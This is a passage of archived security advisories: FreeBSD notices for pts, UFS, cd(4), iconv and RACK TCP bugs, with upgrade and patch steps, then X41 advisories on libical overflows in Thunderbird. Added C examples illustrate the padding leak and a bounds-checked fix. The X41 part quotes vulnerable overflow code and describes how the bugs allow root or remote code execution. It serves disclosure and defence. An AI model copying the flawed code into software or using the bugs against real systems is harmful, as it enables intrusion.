b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in <https://www.FreeBSD.org/handbook/makeworld.html>.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-----------------------------------------------------------------------------
stable/12/                                                        r350139
releng/12.0/                                                      r350281
stable/11/                                                        r350140
releng/11.2/                                                      r350281
releng/11.3/                                                      r350281
-----------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0053>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-19:12.telnet.asc>
-BEGIN PGP SIGNATURE-

FreeBSD Security Advisory FreeBSD-SA-19:13.pts

2019-07-24 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=============================================================================
FreeBSD-SA-19:13.pts                                        Security Advisory
                                                          The FreeBSD Project

Topic:          pts(4) write-after-free

Category:       core
Module:         kernel
Announced:      2019-07-24
Credits:        syzkaller
Affects:        All supported versions of FreeBSD.
Corrected:      2019-07-07 14:19:46 UTC (stable/12, 12.0-STABLE)
                2019-07-24 12:53:06 UTC (releng/12.0, 12.0-RELEASE-p8)
                2019-07-07 14:20:14 UTC (stable/11, 11.2-STABLE)
                2019-07-24 12:53:06 UTC (releng/11.2, 11.2-RELEASE-p12)
                2019-07-24 12:53:06 UTC (releng/11.3, 11.3-RELEASE-p1)
CVE Name:       CVE-2019-5606

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

The posix_openpt(2) system call allocates a pseudo-terminal device and
returns a descriptor referencing that device.  Such a descriptor may be
configured such that a SIGIO signal will be sent to a designated process
or process group when the device is ready to perform I/O.

II.  Problem Description

The code which handles a close(2) of a descriptor created by
posix_openpt(2) fails to undo the configuration which causes SIGIO to be
raised.  This bug can lead to a write-after-free of kernel memory.

III. Impact

The bug permits malicious code to trigger a write-after-free, which may
be used to gain root privileges or escape a jail.

IV.  Workaround

No workaround is available.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:13/pts.patch
# fetch https://security.FreeBSD.org/patches/SA-19:13/pts.patch.asc
# gpg --verify pts.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-----------------------------------------------------------------------------
stable/12/                                                        r349805
releng/12.0/                                                      r350282
stable/11/                                                        r349806
releng/11.2/                                                      r350282
releng/11.3/                                                      r350282
-----------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5606>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-19:13.pts.asc>
-BEGIN PGP SIGNATURE-

FreeBSD Security Advisory FreeBSD-SA-19:10.ufs

2019-07-03 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=============================================================================
FreeBSD-SA-19:10.ufs                                        Security Advisory
                                                          The FreeBSD Project

Topic:          Kernel stack disclosure in UFS/FFS

Category:       core
Module:         Kernel
Announced:      2019-07-02
Credits:        David G. Lawrence
Affects:        All supported versions of FreeBSD.
Corrected:      2019-05-10 23:45:16 UTC (stable/12, 12.0-STABLE)
                2019-07-02 00:02:16 UTC (releng/12.0, 12.0-RELEASE-p7)
                2019-05-10 23:46:42 UTC (stable/11, 11.2-STABLE)
                2019-07-02 00:02:16 UTC (releng/11.2, 11.2-RELEASE-p11)
CVE Name:       CVE-2019-5601

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

The Berkeley Fast File System (FFS) is an implementation of the UNIX File
System (UFS) filesystem used by FreeBSD.

II.  Problem Description

A bug causes up to three bytes of kernel stack memory to be written to disk
as uninitialized directory entry padding.  This data can be viewed by any
user with read access to the directory.  Additionally, a malicious user with
write access to a directory can cause up to 254 bytes of kernel stack memory
to be exposed.
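The freebsd32_ioctl disclosure earlier on this page and this UFS padding bug share one mechanism: bytes a writer never explicitly sets keep whatever the buffer held before, and then travel to userland or to disk. The following C program is an added illustration, not FreeBSD code: its record layout (a hypothetical 1-byte length, the name, a NUL, padded to a 4-byte boundary) is a simplification of a directory entry, the 0xAA "stale" buffer content is constructed, and the function names are the example's own.

```c
/*
 * Added example (not FreeBSD code): how "uninitialized padding" leaks the
 * bytes that happened to be in a buffer, and the fix of zeroing the whole
 * record before filling it.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical record: 1-byte length, name bytes, NUL, padded to 4 bytes. */
#define REC_NAME_MAX 255
#define ROUNDUP4(x) (((x) + 3) & ~(size_t)3)

/* Size of the padded record for a name of namelen bytes. */
static size_t rec_size(size_t namelen)
{
    return ROUNDUP4(1 + namelen + 1);
}

/* Vulnerable pattern: writes only the bytes it means to write, so the
 * 0-3 padding bytes keep whatever the buffer previously held. */
size_t write_rec_unsafe(uint8_t *buf, const char *name)
{
    size_t n = strlen(name);
    if (n > REC_NAME_MAX)
        n = REC_NAME_MAX;
    buf[0] = (uint8_t)n;
    memcpy(buf + 1, name, n);
    buf[1 + n] = '\0';
    return rec_size(n);
}

/* Fixed pattern: clear the entire record region first, then fill it. */
size_t write_rec_safe(uint8_t *buf, const char *name)
{
    size_t n = strlen(name);
    if (n > REC_NAME_MAX)
        n = REC_NAME_MAX;
    size_t sz = rec_size(n);
    memset(buf, 0, sz);          /* padding is now deterministic zeros */
    buf[0] = (uint8_t)n;
    memcpy(buf + 1, name, n);    /* NUL already present from memset */
    return sz;
}

/* Count padding bytes (after the NUL, before the record end) that still
 * hold the sentinel, i.e. the bytes a reader of the record would see
 * leaked from the buffer's previous contents. */
size_t leaked_bytes(const uint8_t *buf, size_t namelen, uint8_t sentinel)
{
    size_t leaked = 0;
    for (size_t i = 1 + namelen + 1; i < rec_size(namelen); i++)
        if (buf[i] == sentinel)
            leaked++;
    return leaked;
}

/* Simulate a reused buffer: fill it with constructed stale content (0xAA),
 * write one record with the chosen writer, and report leaked bytes. */
size_t demo_leak(const char *name, int safe)
{
    uint8_t buf[REC_NAME_MAX + 8];
    memset(buf, 0xAA, sizeof buf);   /* stands in for old stack/disk data */
    if (safe)
        write_rec_safe(buf, name);
    else
        write_rec_unsafe(buf, name);
    return leaked_bytes(buf, strlen(name), 0xAA);
}

int main(void)
{
    const char *names[] = { "a", "ab", "abc", "abcd" };
    for (int i = 0; i < 4; i++)
        printf("%-5s unsafe leaks %zu byte(s), safe leaks %zu\n",
               names[i], demo_leak(names[i], 0), demo_leak(names[i], 1));
    return 0;
}
```

The unsafe writer leaks between zero and three bytes depending on the name length, which is exactly the range the advisory describes; the safe writer leaks none.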

III. Impact

Some amount of the kernel stack is disclosed and written out to the
filesystem.

IV.  Workaround

No workaround is available but systems not using UFS/FFS are not affected.

V.   Solution

Special note: This update also adds the -z flag to fsck_ffs to have it scrub
the leaked information in the name padding of existing directories.  It only
needs to be run once on each UFS/FFS filesystem after a patched kernel is
installed and running.

Upgrade your vulnerable system to a supported FreeBSD stable or release /
security branch (releng) dated after the correction date.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterwards, reboot the system and run:

# fsck -t ufs -f -p -T ufs:-z

to clean up your existing filesystems.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 12.x]
# fetch https://security.FreeBSD.org/patches/SA-19:10/ufs.12.patch
# fetch https://security.FreeBSD.org/patches/SA-19:10/ufs.12.patch.asc
# gpg --verify ufs.12.patch.asc

[FreeBSD 11.x]
# fetch https://security.FreeBSD.org/patches/SA-19:10/ufs.11.patch
# fetch https://security.FreeBSD.org/patches/SA-19:10/ufs.11.patch.asc
# gpg --verify ufs.11.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system and run:

# fsck -t ufs -f -p -T ufs:-z

to clean up your existing filesystems.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-----------------------------------------------------------------------------
stable/12/                                                        r347474
releng/12.0/                                                      r349623
stable/11/                                                        r347475
releng/11.2/                                                      r349623
-----------------------------------------------------------------------------

Note: This patch was applied to the stable/11 branch before the branch point
for releng/11.3. As such, no patch is needed for any 11.3-BETA or -RC.

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5601>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-19:10.ufs.asc>
-BEGIN PGP SIGNATURE-

FreeBSD Security Advisory FreeBSD-SA-19:11.cd_ioctl

2019-07-03 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=============================================================================
FreeBSD-SA-19:11.cd_ioctl                                   Security Advisory
                                                          The FreeBSD Project

Topic:          Privilege escalation in cd(4) driver

Category:       core
Module:         kernel
Announced:      2019-07-02
Credits:        Alex Fortune
Affects:        All supported versions of FreeBSD.
Corrected:      2019-07-03 00:11:31 UTC (stable/12, 12.0-STABLE)
                2019-07-02 00:03:55 UTC (releng/12.0, 12.0-RELEASE-p7)
                2019-07-03 00:12:50 UTC (stable/11, 11.3-PRERELEASE)
                2019-07-02 00:03:55 UTC (releng/11.3, 11.3-RC3-p1)
                2019-07-02 00:03:55 UTC (releng/11.2, 11.2-RELEASE-p11)
CVE Name:       CVE-2019-5602

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

The cd(4) driver implements a number of ioctls to permit low-level access to
the media in the CD-ROM device.  The Linux emulation layer provides a
corresponding set of ioctls, some of which are implemented as wrappers of
native cd(4) ioctls.

These ioctls are available to users in the operator group, which gets
read-only access to cd(4) devices by default.

II.  Problem Description

To implement one particular ioctl, the Linux emulation code used a special
interface present in the cd(4) driver which allows it to copy subchannel
information directly to a kernel address.  This interface was erroneously
made accessible to userland, allowing users with read access to a cd(4)
device to arbitrarily overwrite kernel memory when some media is present in
the device.

III. Impact

A user in the operator group can make use of this interface to gain root
privileges on a system with a cd(4) device when some media is present in the
device.

IV.  Workaround

devfs.conf(5) and devfs.rules(5) can be used to remove read permissions from
cd(4) devices.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or release /
security branch (releng) dated after the correction date.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterwards, reboot the system.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 12.x]
# fetch https://security.FreeBSD.org/patches/SA-19:11/cd_ioctl.12.patch
# fetch https://security.FreeBSD.org/patches/SA-19:11/cd_ioctl.12.patch.asc
# gpg --verify cd_ioctl.12.patch.asc

[FreeBSD 11.x]
# fetch https://security.FreeBSD.org/patches/SA-19:11/cd_ioctl.11.patch
# fetch https://security.FreeBSD.org/patches/SA-19:11/cd_ioctl.11.patch.asc
# gpg --verify cd_ioctl.11.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-----------------------------------------------------------------------------
stable/12/                                                        r349628
releng/12.0/                                                      r349625
stable/11/                                                        r349629
releng/11.3/                                                      r349625
releng/11.2/                                                      r349625
-----------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5602>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-19:11.cd_ioctl.asc>
-BEGIN PGP SIGNATURE-

FreeBSD Security Advisory FreeBSD-SA-19:09.iconv

2019-07-03 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=============================================================================
FreeBSD-SA-19:09.iconv                                      Security Advisory
                                                          The FreeBSD Project

Topic:          iconv buffer overflow

Category:       core
Module:         libc
Announced:      2019-07-02
Credits:        Andrea Venturoli, NetFence
Affects:        All supported versions of FreeBSD.
Corrected:      2019-07-03 00:01:38 UTC (stable/12, 12.0-STABLE)
                2019-07-03 00:00:39 UTC (releng/12.0, 12.0-RELEASE-p7)
                2019-07-03 00:03:14 UTC (stable/11, 11.3-PRERELEASE)
                2019-07-03 00:00:39 UTC (releng/11.3, 11.3-RC3-p1)
                2019-07-03 00:00:39 UTC (releng/11.2, 11.2-RELEASE-p11)
CVE Name:       CVE-2019-5600

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

The iconv(3) API converts text data from one character encoding to another
and is available as part of the standard C library (libc).

II.  Problem Description

With certain inputs, iconv may write beyond the end of the output buffer.

III. Impact

Depending on the way in which iconv is used, an attacker may be able to
create a denial of service, provoke incorrect program behavior, or induce a
remote code execution.  iconv is a libc library function and the nature of
possible attacks will depend on the way in which iconv is used by
applications or daemons.

IV.  Workaround

No workaround is available.  Stack canaries (-fstack-protector), which are
enabled by default, provide a degree of defense against code injection but
not against denial of service.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or release /
security branch (releng) dated after the correction date.  Restart any
potentially affected daemons.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:09/iconv.patch
# fetch https://security.FreeBSD.org/patches/SA-19:09/iconv.patch.asc
# gpg --verify iconv.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in <https://www.FreeBSD.org/handbook/makeworld.html>.

Restart all daemons that use the library, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-----------------------------------------------------------------------------
stable/12/                                                        r349622
releng/12.0/                                                      r349621
stable/11/                                                        r349624
releng/11.3/                                                      r349621
releng/11.2/                                                      r349621
-----------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5600>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-19:09.iconv.asc>
-BEGIN PGP SIGNATURE-

FreeBSD Security Advisory FreeBSD-SA-19:08.rack

2019-06-24 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=============================================================================
FreeBSD-SA-19:08.rack                                       Security Advisory
                                                          The FreeBSD Project

Topic:          Resource exhaustion in non-default RACK TCP stack

Category:       core
Module:         inet
Announced:      2019-06-19
Credits:        Jonathan Looney (Netflix)
                Peter Lei (Netflix)
Affects:        FreeBSD 12.0 and later
Corrected:      2019-06-19 16:25:39 UTC (stable/12, 12.0-STABLE)
                2019-06-19 16:43:05 UTC (releng/12.0, 12.0-RELEASE-p6)
CVE Name:       CVE-2019-5599

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

The Transmission Control Protocol (TCP) of the TCP/IP protocol suite provides
a connection-oriented, reliable, sequence-preserving data stream service.

A TCP loss detection algorithm called RACK ("Recent ACKnowledgment") uses the
notion of time, in addition to packet or sequence counts, to detect losses
for modern TCP implementations that support per-packet timestamps and the
selective acknowledgment (SACK) option.

FreeBSD ships an optional implementation of RACK.  Please note this is not
included by default. If RACK was not specifically compiled, installed, and
loaded, the system is not vulnerable.

II.  Problem Description

While processing acknowledgements, the RACK code uses several linked lists to
maintain state entries.  A malicious attacker can cause the lists to grow
unbounded.  This can cause an expensive list traversal on every packet being
processed, leading to resource exhaustion and a denial of service.

III. Impact

An attacker with the ability to send specially crafted TCP traffic to a
victim system can degrade network performance and/or consume excessive CPU by
exploiting the inefficiency of traversing the potentially very large RACK
linked lists with relatively small bandwidth cost.

IV.  Workaround

By default RACK is not compiled or loaded into the TCP stack.  To determine
if you are using RACK, check the net.inet.tcp.functions_available sysctl.
If it includes a line with "rack", the RACK stack is loaded.

To disable RACK, unload the kernel module with:

# kldunload tcp_rack

Note: it may be required to use the force flag (-f) with the kldunload.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or release /
security branch (releng) dated after the correction date.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Since the tcp_rack kernel module is not built by default, recompile,
reinstall, and reload the kernel module.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:08/rack.patch
# fetch https://security.FreeBSD.org/patches/SA-19:08/rack.patch.asc
# gpg --verify rack.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile, reinstall, and reload the tcp_rack kernel module.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/12/                                                        r349197
releng/12.0/                                                      r349199
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision&revision=NN

VII. References

https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-001.md

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5599

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:08.rack.asc

X41 D-Sec GmbH Security Advisory X41-2019-004: Type confusion in Thunderbird

2019-06-14 Thread X41 D-Sec GmbH Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2019-004

Type confusion in Thunderbird
=============================
Severity Rating: Medium
Confirmed Affected Versions: All versions affected
Confirmed Patched Versions: Thunderbird ESR 60.7.XXX
Vendor: Thunderbird
Vendor URL: https://www.thunderbird.net/
Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1555646
Vector: Incoming mail with calendar attachment
Credit: X41 D-SEC GmbH, Luis Merino
Status: Public
CVE: CVE-2019-11706
CWE: 843
CVSS Score: 6.5
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O
Advisory-URL:
https://www.x41-dsec.de/lab/advisories/x41-2019-004-thunderbird

Summary and Impact
==================
A type confusion has been identified in the Thunderbird email
client. The issue is present in the libical implementation, which was
forked from upstream libical version 0.47.
The issue can be triggered remotely when an attacker sends a specially
crafted calendar attachment, and it does not require user interaction. It
might be used by a remote attacker to crash the process or leak
information from the client system via calendar replies.
X41 did not perform a full test or audit on the software.

Product Description
===
Thunderbird is a free and open source email, newsfeed, chat, and
calendaring client, that's easy to set up and customize.

Analysis
========
A type confusion in icalproperty.c
icaltimezone_get_vtimezone_properties() can be triggered while parsing a
malformed calendar attachment. Missing sanity checks allow a TZID
property to be parsed as ICAL_FLOAT_VALUE but later used as a string.
The bug manifests as strdup(tzid) being called with tzid containing a
bad pointer obtained by casting a float value to char*, which typically
means a segfault from dereferencing a non-mapped memory page.
An attacker might be able to deliver an input file containing specially
crafted float values as TZID properties which could point to arbitrary
memory positions.
Certain conditions could allow information to be exfiltrated via a
calendar reply, or have other undetermined impact.

Proof of Concept
================
A reproducer eml file can be found in

https://github.com/x41sec/advisories/tree/master/X41-2019-004

Workarounds
===
A fix is available from upstream. Alternatively, libical can be replaced
by icaljs, a JavaScript implementation of ical parsing, by setting
calendar.icaljs = true in Thunderbird configuration.

Timeline
========
2019-05-30 Issues reported to the vendor
2019-06-07 Vendor reply
2019-06-12 CVE IDs assigned
2019-06-13 Patched Version released
2019-06-13 Advisory released

About X41 D-SEC GmbH
====================
X41 is an expert provider for application security services.
Having extensive industry experience and expertise in the area of
information security, a strong core security team of world class
security experts enables X41 to perform premium security services.
Fields of expertise in the area of application security are security
centered code reviews, binary reverse engineering and vulnerability
discovery.

Custom research and IT security consulting and support services are
core competencies of X41.


X41 D-Sec GmbH Security Advisory X41-2019-003: Stack-based buffer overflow in Thunderbird

2019-06-14 Thread X41 D-Sec GmbH Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2019-003

Stack-based buffer overflow in Thunderbird
==========================================
Severity Rating: High
Confirmed Affected Versions: All versions affected
Confirmed Patched Versions: Thunderbird ESR 60.7.XXX
Vendor: Thunderbird
Vendor URL: https://www.thunderbird.net/
Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1553808
Vector: Incoming mail with calendar attachment
Credit: X41 D-SEC GmbH, Luis Merino
Status: Public
CVE: CVE-2019-11705
CWE: 121
CVSS Score: 7.8
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O
Advisory-URL:
https://www.x41-dsec.de/lab/advisories/x41-2019-003-thunderbird

Summary and Impact
==================
A stack-based buffer overflow has been identified in the Thunderbird
email client. The issue is present in the libical implementation, which
was forked from upstream libical version 0.47.
The issue can be triggered remotely when an attacker sends a specially
crafted calendar attachment, and it does not require user interaction. It
might be used by a remote attacker to crash or gain remote code
execution in the client system.
X41 did not perform a full test or audit on the software.

Product Description
===
Thunderbird is a free and open source email, newsfeed, chat, and
calendaring client, that's easy to set up and customize.

Analysis
========
A stack-based buffer overflow in icalrecur.c icalrecur_add_bydayrules()
can be triggered while parsing a calendar attachment containing a
malformed or specially crafted string.

~~~
static int icalrecur_add_bydayrules(struct icalrecur_parser *parser,
                                    const char *vals)
{
    short *array = parser->rt.by_day;
    // ...
    while (n != 0) {
        // ...
        if (wd != ICAL_NO_WEEKDAY) {
            /* i is never compared against the size of by_day before
               the two writes below */
            array[i++] = (short) (sign * (wd + 8 * weekno));
            array[i] = ICAL_RECURRENCE_ARRAY_MAX;
        }
    }
~~~

Missing sanity checks in `icalrecur_add_bydayrules()` can lead to an
out-of-bounds write in `array` when `weekno` takes an invalid value.
The issue manifests as an out-of-bounds write to a stack-allocated
buffer.
It is expected that an attacker can exploit this vulnerability to
achieve remote code execution when proper stack smashing mitigations
are missing.
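An added example, not X41's or libical's code, showing the bounds check the advisory reports as missing: a BYDAY parser that encodes entries the same way as the snippet above (sign * (weekday + 8 * weekno), sentinel-terminated) and refuses any list that would not fit in the array. BY_DAY_SIZE, the sentinel value and the weekday table are defined locally for this example and are not imported from libical.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed for this example; not libical's definitions. */
#define BY_DAY_SIZE 8                 /* small on purpose, so the limit is easy to hit */
#define RECURRENCE_ARRAY_MAX 0x7f7f   /* sentinel that terminates the array */
#define NO_WEEKDAY 0

/* Weekday codes SU=1 .. SA=7; 0 means "not a weekday". */
static short weekday_from_name(const char *s)
{
    static const char *const names[] = { "SU", "MO", "TU", "WE", "TH", "FR", "SA" };
    for (int i = 0; i < 7; i++)
        if (strncmp(s, names[i], 2) == 0)
            return (short)(i + 1);
    return NO_WEEKDAY;
}

/* Parse a BYDAY list such as "MO,TU,-1FR,+2SA" into out[], which holds `size`
 * shorts.  Entries are encoded as sign * (weekday + 8 * weekno) and the list is
 * terminated by RECURRENCE_ARRAY_MAX, mirroring the advisory's snippet.
 * Returns the number of entries stored, or -1 for malformed input or for input
 * that would not fit.  The difference from the vulnerable loop is the test
 * `i + 1 >= size` before the two writes: there must be room both for the value
 * and for the sentinel that follows it. */
int parse_byday(const char *vals, short *out, size_t size)
{
    size_t i = 0;
    const char *p = vals;

    if (size < 1)
        return -1;
    out[0] = RECURRENCE_ARRAY_MAX;    /* an empty list is still terminated */

    while (*p != '\0') {
        int sign = 1;
        int weekno = 0;

        if (*p == '-') {
            sign = -1;
            p++;
        } else if (*p == '+') {
            p++;
        }

        /* Optional ordinal week number; RFC 5545 allows 1..53. */
        while (isdigit((unsigned char)*p)) {
            weekno = weekno * 10 + (*p - '0');
            if (weekno > 53)
                return -1;
            p++;
        }

        short wd = weekday_from_name(p);
        if (wd == NO_WEEKDAY)
            return -1;                /* unknown or truncated day name */
        p += 2;

        /* The bounds check missing from the vulnerable code. */
        if (i + 1 >= size)
            return -1;
        out[i++] = (short)(sign * (wd + 8 * weekno));
        out[i] = RECURRENCE_ARRAY_MAX;

        if (*p == ',')
            p++;
        else if (*p != '\0')
            return -1;                /* trailing junk after a day name */
    }
    return (int)i;
}

int main(void)
{
    short by_day[BY_DAY_SIZE];
    int n = parse_byday("MO,TU,-1FR,+2SA", by_day, BY_DAY_SIZE);
    printf("parsed %d entries:", n);
    for (int i = 0; i < n; i++)
        printf(" %d", by_day[i]);
    printf("\n");
    /* Eight entries need nine slots; this is rejected instead of overflowing. */
    printf("overlong list -> %d\n",
           parse_byday("MO,TU,WE,TH,FR,SA,SU,MO", by_day, BY_DAY_SIZE));
    return 0;
}
```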

Proof of Concept
================
A reproducer eml file can be found in

https://github.com/x41sec/advisories/tree/master/X41-2019-003

Workarounds
===
A fix is available from upstream. Alternatively, libical can be replaced
by icaljs, a JavaScript implementation of ical parsing, by setting
calendar.icaljs = true in Thunderbird configuration.

Timeline
========
2019-05-23 Issues reported to the vendor
2019-05-23 Vendor reply
2019-06-12 CVE IDs assigned
2019-06-13 Patched Version released
2019-06-13 Advisory released

About X41 D-SEC GmbH
====================
X41 is an expert provider for application security services.
Having extensive industry experience and expertise in the area of
information security, a strong core security team of world class
security experts enables X41 to perform premium security services.
Fields of expertise in the area of application security are security
centered code reviews, binary reverse engineering and vulnerability
discovery.

Custom research and IT security consulting and support services are
core competencies of X41.


X41 D-Sec GmbH Security Advisory X41-2019-002: Heap-based buffer overflow in Thunderbird

2019-06-14 Thread X41 D-Sec GmbH Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2019-002

Heap-based buffer overflow in Thunderbird
=========================================
Severity Rating: High
Confirmed Affected Versions: All versions affected
Confirmed Patched Versions: Thunderbird ESR 60.7.XXX
Vendor: Thunderbird
Vendor URL: https://www.thunderbird.net/
Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1553820
Vector: Incoming mail with calendar attachment
Credit: X41 D-SEC GmbH, Luis Merino
Status: Public
CVE: CVE-2019-11703
CWE: 122
CVSS Score: 7.8
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O
Advisory-URL:
https://www.x41-dsec.de/lab/advisories/x41-2019-002-thunderbird

Summary and Impact
==================
A heap-based buffer overflow has been identified in the Thunderbird
email client. The issue is present in the libical implementation, which
was forked from upstream libical version 0.47.
The issue can be triggered remotely when an attacker sends a specially
crafted calendar attachment, and it does not require user interaction. It
